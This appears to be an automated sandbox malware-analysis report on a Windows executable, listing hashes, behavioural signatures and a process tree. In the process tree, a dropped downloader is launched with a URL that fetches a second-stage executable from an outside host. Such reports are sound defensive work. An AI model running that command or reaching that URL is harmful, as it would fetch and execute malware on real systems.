Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
29/05/2024, 20:57
Behavioral task
behavioral1
Sample
81e58fca05353c9565ccb264ffecf13e_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
81e58fca05353c9565ccb264ffecf13e_JaffaCakes118.exe
Resource
win10v2004-20240508-en
General
-
Target
81e58fca05353c9565ccb264ffecf13e_JaffaCakes118.exe
-
Size
1.4MB
-
MD5
81e58fca05353c9565ccb264ffecf13e
-
SHA1
c745b95f0ccf927fa6e0457dfce17edf576081b9
-
SHA256
2ed1adbbb00f4c015163ea0c133b556afe91b3d6be73b14a31eb38c5f2bf9d9e
-
SHA512
e6813ac089daa16f3b5d9e1c42f845c5842e1c669c2047ca5425a445657d26f3b5de98e90a6159644051262d1e7a8dfc5a54c2baad76249ac0ddf9f2b839c37e
-
SSDEEP
24576:p1k2uKRw5jaM7UZ+CJwdAFsc6NojPh7oCIB0ix1zX2oUsYzDrve5nubRy+5:r4KE2VXJwdSP6WjZMJT2zz+5nU5
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation 81e58fca05353c9565ccb264ffecf13e_JaffaCakes118.exe -
Executes dropped EXE 1 IoCs
pid Process 1212 ariant.exe -
resource yara_rule behavioral2/memory/3596-0-0x0000000000400000-0x000000000043D000-memory.dmp upx behavioral2/memory/3596-14-0x0000000000400000-0x000000000043D000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\kopalor.sql cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 8 PING.EXE 4412 PING.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3596 wrote to memory of 2284 3596 81e58fca05353c9565ccb264ffecf13e_JaffaCakes118.exe 85 PID 3596 wrote to memory of 2284 3596 81e58fca05353c9565ccb264ffecf13e_JaffaCakes118.exe 85 PID 3596 wrote to memory of 2284 3596 81e58fca05353c9565ccb264ffecf13e_JaffaCakes118.exe 85 PID 2284 wrote to memory of 1212 2284 cmd.exe 87 PID 2284 wrote to memory of 1212 2284 cmd.exe 87 PID 2284 wrote to memory of 1212 2284 cmd.exe 87 PID 2284 wrote to memory of 8 2284 cmd.exe 89 PID 2284 wrote to memory of 8 2284 cmd.exe 89 PID 2284 wrote to memory of 8 2284 cmd.exe 89 PID 2284 wrote to memory of 4412 2284 cmd.exe 94 PID 2284 wrote to memory of 4412 2284 cmd.exe 94 PID 2284 wrote to memory of 4412 2284 cmd.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\81e58fca05353c9565ccb264ffecf13e_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\81e58fca05353c9565ccb264ffecf13e_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pon.bat" "2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Users\Admin\AppData\Local\Temp\ariant.exeariant.exe http://konik.ikwb.com/ponya.exe3⤵
- Executes dropped EXE
PID:1212
-
-
C:\Windows\SysWOW64\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
PID:8
-
-
C:\Windows\SysWOW64\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
PID:4412
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.1MB
MD54f613f7487cfccb7ffc6c0f28215e71f
SHA174e62481e808d625e57978f48e6f3e44fa10888f
SHA256acf2f13448527c75f33a7dbed120d492b327d6b022c39c3838266b5adcd86910
SHA512e5cd9e2537639f89bf3868777db3e76a96f3e861b57fba887711793c443d456cd5ea60508a5a6bfd0b315acef13fffe064d2b68fd374e99aab925408bb5bb1f4
-
Filesize
824B
MD5f6097f2efd2a41d757129b1c764c51fd
SHA1d2a65e4e95698b59303061eb108788396b4c9957
SHA256f183c99f7581f6b5b0ef7c4c6bf99458369d2d9c0428bb7dfeb57ff983e0e6f6
SHA5126655c6954e4f2af547acd2155db7a46a085fc1af051abb8663239a7f5cce1c4af09501814779d11d09e1db26f52961d5405fc837cecf73762fe549eee2162f71